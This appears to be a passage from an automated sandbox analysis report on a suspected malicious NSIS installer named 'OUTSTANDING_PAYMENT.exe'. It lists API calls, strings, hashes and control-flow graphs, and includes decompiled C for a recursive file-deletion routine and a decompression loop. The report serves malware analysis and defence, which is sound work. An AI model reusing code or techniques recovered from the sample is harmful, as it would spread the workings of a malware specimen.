                                                                                                                        0x00403bf3
                                                                                                                        0x00403bf4
                                                                                                                        0x00403bf9
                                                                                                                        0x00403c08
                                                                                                                        0x00403c0a
                                                                                                                        0x00000000
                                                                                                                        0x00403c0a
                                                                                                                        0x00000000
                                                                                                                        0x00403bf9
                                                                                                                        0x00403bed
                                                                                                                        0x00403b84
                                                                                                                        0x00403b8b
                                                                                                                        0x00403b8b
                                                                                                                        0x004039a1
                                                                                                                        0x00403a48
                                                                                                                        0x00403a48
                                                                                                                        0x00403a54
                                                                                                                        0x00000000
                                                                                                                        0x00403a54
                                                                                                                        0x004039b2
                                                                                                                        0x004039ba
                                                                                                                        0x00403a0c
                                                                                                                        0x00403a0c
                                                                                                                        0x00403a12
                                                                                                                        0x00403a19
                                                                                                                        0x00403a67
                                                                                                                        0x00403a69
                                                                                                                        0x00403a6e
                                                                                                                        0x00403a70
                                                                                                                        0x00403a78
                                                                                                                        0x00403a78
                                                                                                                        0x00403a83
                                                                                                                        0x00403a88
                                                                                                                        0x00403a8f
                                                                                                                        0x00403a95
                                                                                                                        0x00403a97
                                                                                                                        0x00403b6a
                                                                                                                        0x00403b6a
                                                                                                                        0x00403b6a
                                                                                                                        0x00000000
                                                                                                                        0x00403a9d
                                                                                                                        0x00403a9d
                                                                                                                        0x00403a9f
                                                                                                                        0x00403aa0
                                                                                                                        0x00403aa9
                                                                                                                        0x00403aa2
                                                                                                                        0x00403aa2
                                                                                                                        0x00403aa2
                                                                                                                        0x00403aaf
                                                                                                                        0x00403ab7
                                                                                                                        0x00403abe
                                                                                                                        0x00403ac6
                                                                                                                        0x00403ac6
                                                                                                                        0x00403ad3
                                                                                                                        0x00403adf
                                                                                                                        0x00403ae9
                                                                                                                        0x00403ae9
                                                                                                                        0x00403aeb
                                                                                                                        0x00403af2
                                                                                                                        0x00403afc
                                                                                                                        0x00403b08
                                                                                                                        0x00403b0e
                                                                                                                        0x00403b14
                                                                                                                        0x00403b17
                                                                                                                        0x00403b21
                                                                                                                        0x00403b27
                                                                                                                        0x00403b29
                                                                                                                        0x00403b2d
                                                                                                                        0x00403b3e
                                                                                                                        0x00403b44
                                                                                                                        0x00403b49
                                                                                                                        0x00403b4b
                                                                                                                        0x00403b4e
                                                                                                                        0x00403b54
                                                                                                                        0x00403b54
                                                                                                                        0x00403b4b
                                                                                                                        0x00403b29
                                                                                                                        0x00403b57
                                                                                                                        0x00403b5e
                                                                                                                        0x00403b5e
                                                                                                                        0x00403b5e
                                                                                                                        0x00403b5e
                                                                                                                        0x00403b65
                                                                                                                        0x00000000
                                                                                                                        0x00403b65
                                                                                                                        0x00403a97
                                                                                                                        0x00403a1b
                                                                                                                        0x00403a1e
                                                                                                                        0x00403a22
                                                                                                                        0x00403a27
                                                                                                                        0x00403a29
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403a35
                                                                                                                        0x00403a40
                                                                                                                        0x00403a45
                                                                                                                        0x00000000
                                                                                                                        0x00403a45
                                                                                                                        0x004039c3
                                                                                                                        0x004039db
                                                                                                                        0x004039ec
                                                                                                                        0x004039ed
                                                                                                                        0x004039f1
                                                                                                                        0x004039f3
                                                                                                                        0x00403a01
                                                                                                                        0x00403a08
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403a08
                                                                                                                        0x00403a0a
                                                                                                                        0x00000000
                                                                                                                        0x00403a0a
                                                                                                                        0x0040392d
                                                                                                                        0x00403939
                                                                                                                        0x0040393e
                                                                                                                        0x00403943
                                                                                                                        0x00403945
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040394d
                                                                                                                        0x00403955
                                                                                                                        0x00403966
                                                                                                                        0x0040396e
                                                                                                                        0x00403970
                                                                                                                        0x00403975
                                                                                                                        0x00403977
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403977
                                                                                                                        0x00000000
                                                                                                                        0x004038d4
                                                                                                                        0x0040387d
                                                                                                                        0x0040387f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403881
                                                                                                                        0x00403885
                                                                                                                        0x00403889
                                                                                                                        0x00403890
                                                                                                                        0x00403890
                                                                                                                        0x00403890
                                                                                                                        0x00403890
                                                                                                                        0x00000000
                                                                                                                        0x00403890
                                                                                                                        0x0040388b
                                                                                                                        0x0040388e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040388e
                                                                                                                        0x00403827
                                                                                                                        0x0040382b
                                                                                                                        0x0040382e
                                                                                                                        0x00403835
                                                                                                                        0x00403835
                                                                                                                        0x00000000
                                                                                                                        0x00403835
                                                                                                                        0x00403830
                                                                                                                        0x00403833
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403833
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403801
                                                                                                                        0x00403801
                                                                                                                        0x00403802
                                                                                                                        0x00403803
                                                                                                                        0x00403803
                                                                                                                        0x00000000
                                                                                                                        0x00403801
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 0040368C
                                                                                                                        • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                                                                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                                                                                                        • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                                                                                                        • OleInitialize.OLE32(00000000), ref: 0040377D
                                                                                                                        • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                                                                                                                        • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                                                                                                                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe",00000020,"C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe",00000000), ref: 004037E9
                                                                                                                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                                                                                                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                                                                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                                                                                                                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                                                                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                                                                                                                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                                                                                                                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                                                                                                                        • DeleteFileW.KERNELBASE(1033), ref: 00403982
                                                                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
                                                                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78
                                                                                                                          • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
                                                                                                                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe",00000000,?), ref: 00403A8F
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                                                                                                                        • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                                                                                                                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe,00420F08,00000001), ref: 00403B21
                                                                                                                        • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                                                                                                                        • ExitProcess.KERNEL32(?), ref: 00403B6C
                                                                                                                        • OleUninitialize.OLE32(?), ref: 00403B71
                                                                                                                        • ExitProcess.KERNEL32 ref: 00403B8B
                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                                                                                                        • ExitWindowsEx.USER32 ref: 00403BFE
                                                                                                                        • ExitProcess.KERNEL32 ref: 00403C1F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                                                        • String ID: "C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                        • API String ID: 2292928366-3232882032
                                                                                                                        • Opcode ID: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                                                                                        • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                                                                                                                        • Opcode Fuzzy Hash: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                                                                                        • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 395 405d74-405d9a call 40603f 398 405db3-405dba 395->398 399 405d9c-405dae DeleteFileW 395->399 401 405dbc-405dbe 398->401 402 405dcd-405ddd call 406668 398->402 400 405f30-405f34 399->400 403 405dc4-405dc7 401->403 404 405ede-405ee3 401->404 410 405dec-405ded call 405f83 402->410 411 405ddf-405dea lstrcatW 402->411 403->402 403->404 404->400 406 405ee5-405ee8 404->406 408 405ef2-405efa call 40699e 406->408 409 405eea-405ef0 406->409 408->400 419 405efc-405f10 call 405f37 call 405d2c 408->419 409->400 414 405df2-405df6 410->414 411->414 415 405e02-405e08 lstrcatW 414->415 416 405df8-405e00 414->416 418 405e0d-405e29 lstrlenW FindFirstFileW 415->418 416->415 416->418 420 405ed3-405ed7 418->420 421 405e2f-405e37 418->421 435 405f12-405f15 419->435 436 405f28-405f2b call 4056ca 419->436 420->404 426 405ed9 420->426 423 405e57-405e6b call 406668 421->423 424 405e39-405e41 421->424 437 405e82-405e8d call 405d2c 423->437 438 405e6d-405e75 423->438 427 405e43-405e4b 424->427 428 405eb6-405ec6 FindNextFileW 424->428 426->404 427->423 431 405e4d-405e55 427->431 428->421 434 405ecc-405ecd FindClose 428->434 431->423 431->428 434->420 435->409 441 405f17-405f26 call 4056ca call 406428 435->441 436->400 446 405eae-405eb1 call 4056ca 437->446 447 405e8f-405e92 437->447 438->428 442 405e77-405e80 call 405d74 438->442 441->400 442->428 446->428 450 405e94-405ea4 call 4056ca call 406428 447->450 451 405ea6-405eac 447->451 450->428 451->428
                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E0040603F(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2e8 =  *0x42a2e8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406668(0x425750, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405F83(_t68);
					} else {
						lstrcatW(0x425750, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425750,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406668(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405D2C(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004056CA(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2e8 =  *0x42a2e8 + 1;
										} else {
											E004056CA(0xfffffff1, _t68);
											E00406428(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405D74(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70); // executed
						goto L26;
					}
					__eflags =  *0x425750 - 0x5c;
					if( *0x425750 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040699E(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405F37(_t68);
							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004056CA(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004056CA(0xfffffff1, _t68);
							return E00406428(_t67, _t68, 0);
						}
						L30:
						 *0x42a2e8 =  *0x42a2e8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                                                                                        0x00405d7e
                                                                                                                        0x00405d83
                                                                                                                        0x00405d8c
                                                                                                                        0x00405d8f
                                                                                                                        0x00405d97
                                                                                                                        0x00405d9a
                                                                                                                        0x00405d9d
                                                                                                                        0x00405da5
                                                                                                                        0x00405da7
                                                                                                                        0x00405da8
                                                                                                                        0x00000000
                                                                                                                        0x00405da8
                                                                                                                        0x00405db3
                                                                                                                        0x00405db6
                                                                                                                        0x00405db6
                                                                                                                        0x00405db6
                                                                                                                        0x00405dba
                                                                                                                        0x00405dcd
                                                                                                                        0x00405dd4
                                                                                                                        0x00405dd9
                                                                                                                        0x00405ddd
                                                                                                                        0x00405ded
                                                                                                                        0x00405ddf
                                                                                                                        0x00405de5
                                                                                                                        0x00405de5
                                                                                                                        0x00405df2
                                                                                                                        0x00405df6
                                                                                                                        0x00405e02
                                                                                                                        0x00405e08
                                                                                                                        0x00405e0d
                                                                                                                        0x00405e13
                                                                                                                        0x00405e1e
                                                                                                                        0x00405e24
                                                                                                                        0x00405e26
                                                                                                                        0x00405e29
                                                                                                                        0x00405ed3
                                                                                                                        0x00405ed3
                                                                                                                        0x00405ed7
                                                                                                                        0x00405ed9
                                                                                                                        0x00405ed9
                                                                                                                        0x00405ed9
                                                                                                                        0x00405ed9
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405e2f
                                                                                                                        0x00405e2f
                                                                                                                        0x00405e2f
                                                                                                                        0x00405e37
                                                                                                                        0x00405e57
                                                                                                                        0x00405e5f
                                                                                                                        0x00405e64
                                                                                                                        0x00405e6b
                                                                                                                        0x00405e86
                                                                                                                        0x00405e8b
                                                                                                                        0x00405e8d
                                                                                                                        0x00405eb1
                                                                                                                        0x00405e8f
                                                                                                                        0x00405e8f
                                                                                                                        0x00405e92
                                                                                                                        0x00405ea6
                                                                                                                        0x00405e94
                                                                                                                        0x00405e97
                                                                                                                        0x00405e9f
                                                                                                                        0x00405e9f
                                                                                                                        0x00405e92
                                                                                                                        0x00405e6d
                                                                                                                        0x00405e73
                                                                                                                        0x00405e75
                                                                                                                        0x00405e7b
                                                                                                                        0x00405e7b
                                                                                                                        0x00405e75
                                                                                                                        0x00000000
                                                                                                                        0x00405e6b
                                                                                                                        0x00405e39
                                                                                                                        0x00405e41
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405e43
                                                                                                                        0x00405e4b
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405e4d
                                                                                                                        0x00405e55
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405eb6
                                                                                                                        0x00405ebe
                                                                                                                        0x00405ec4
                                                                                                                        0x00405ec4
                                                                                                                        0x00405ecd
                                                                                                                        0x00000000
                                                                                                                        0x00405ecd
                                                                                                                        0x00405df8
                                                                                                                        0x00405e00
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405dbc
                                                                                                                        0x00405dbc
                                                                                                                        0x00405dbe
                                                                                                                        0x00405ede
                                                                                                                        0x00405ee0
                                                                                                                        0x00405ee3
                                                                                                                        0x00405f34
                                                                                                                        0x00405f34
                                                                                                                        0x00405f34
                                                                                                                        0x00405ee5
                                                                                                                        0x00405ee8
                                                                                                                        0x00405ef3
                                                                                                                        0x00405ef8
                                                                                                                        0x00405efa
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405efd
                                                                                                                        0x00405f09
                                                                                                                        0x00405f0e
                                                                                                                        0x00405f10
                                                                                                                        0x00000000
                                                                                                                        0x00405f2b
                                                                                                                        0x00405f12
                                                                                                                        0x00405f15
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405f1a
                                                                                                                        0x00000000
                                                                                                                        0x00405f21
                                                                                                                        0x00405eea
                                                                                                                        0x00405eea
                                                                                                                        0x00000000
                                                                                                                        0x00405eea
                                                                                                                        0x00405dc4
                                                                                                                        0x00405dc7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405dc7

                                                                                                                        APIs
                                                                                                                        • DeleteFileW.KERNELBASE(?,?,74D0FAA0,74D0F560,00000000), ref: 00405D9D
                                                                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nshF17F.tmp\*.*,\*.*), ref: 00405DE5
                                                                                                                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                                                                                                                        • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nshF17F.tmp\*.*,?,?,74D0FAA0,74D0F560,00000000), ref: 00405E0E
                                                                                                                        • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nshF17F.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nshF17F.tmp\*.*,?,?,74D0FAA0,74D0F560,00000000), ref: 00405E1E
                                                                                                                        • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                                                                                                        • FindClose.KERNELBASE(00000000), ref: 00405ECD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                        • String ID: .$.$C:\Users\user\AppData\Local\Temp\nshF17F.tmp\*.*$\*.*
                                                                                                                        • API String ID: 2035342205-1755922600
                                                                                                                        • Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                                                                                        • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                                                                                                        • Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                                                                                        • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00406D5F Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 589 406d5f-406d64 590 406dd5-406df3 589->590 591 406d66-406d95 589->591 592 4073cb-4073e0 590->592 593 406d97-406d9a 591->593 594 406d9c-406da0 591->594 595 4073e2-4073f8 592->595 596 4073fa-407410 592->596 597 406dac-406daf 593->597 598 406da2-406da6 594->598 599 406da8 594->599 600 407413-40741a 595->600 596->600 601 406db1-406dba 597->601 602 406dcd-406dd0 597->602 598->597 599->597 606 407441-40744d 600->606 607 40741c-407420 600->607 603 406dbc 601->603 604 406dbf-406dcb 601->604 605 406fa2-406fc0 602->605 603->604 608 406e35-406e63 604->608 612 406fc2-406fd6 605->612 613 406fd8-406fea 605->613 615 406be3-406bec 606->615 609 407426-40743e 607->609 610 4075cf-4075d9 607->610 616 406e65-406e7d 608->616 617 406e7f-406e99 608->617 609->606 614 4075e5-4075f8 610->614 618 406fed-406ff7 612->618 613->618 622 4075fd-407601 614->622 619 406bf2 615->619 620 4075fa 615->620 621 406e9c-406ea6 616->621 617->621 623 406ff9 618->623 624 406f9a-406fa0 618->624 626 406bf9-406bfd 619->626 627 406d39-406d5a 619->627 628 406c9e-406ca2 619->628 629 406d0e-406d12 619->629 620->622 631 406eac 621->631 632 406e1d-406e23 621->632 640 407581-40758b 623->640 641 406f7f-406f97 623->641 624->605 630 406f3e-406f48 624->630 626->614 633 406c03-406c10 626->633 627->592 642 406ca8-406cc1 628->642 643 40754e-407558 628->643 634 406d18-406d2c 629->634 635 40755d-407567 629->635 636 40758d-407597 630->636 637 406f4e-407117 630->637 648 406e02-406e1a 631->648 649 407569-407573 631->649 638 406ed6-406edc 632->638 639 406e29-406e2f 632->639 633->620 647 406c16-406c5c 633->647 650 406d2f-406d37 634->650 635->614 636->614 637->615 645 406f3a 638->645 646 406ede-406efc 638->646 639->608 639->645 640->614 641->624 652 406cc4-406cc8 642->652 643->614 645->630 653 406f14-406f26 646->653 654 406efe-406f12 646->654 655 406c84-406c86 647->655 656 406c5e-406c62 647->656 648->632 649->614 650->627 650->629 652->628 657 406cca-406cd0 652->657 660 406f29-406f33 653->660 654->660 663 406c94-406c9c 655->663 664 406c88-406c92 655->664 661 406c64-406c67 GlobalFree 656->661 662 406c6d-406c7b GlobalAlloc 656->662 658 406cd2-406cd9 657->658 659 406cfa-406d0c 657->659 665 406ce4-406cf4 GlobalAlloc 658->665 666 406cdb-406cde GlobalFree 658->666 659->650 660->638 667 406f35 660->667 661->662 662->620 668 406c81 662->668 663->652 664->663 664->664 665->620 665->659 666->665 670 407575-40757f 667->670 671 406ebb-406ed3 667->671 668->655 670->614 671->638
                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E00406D5F() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
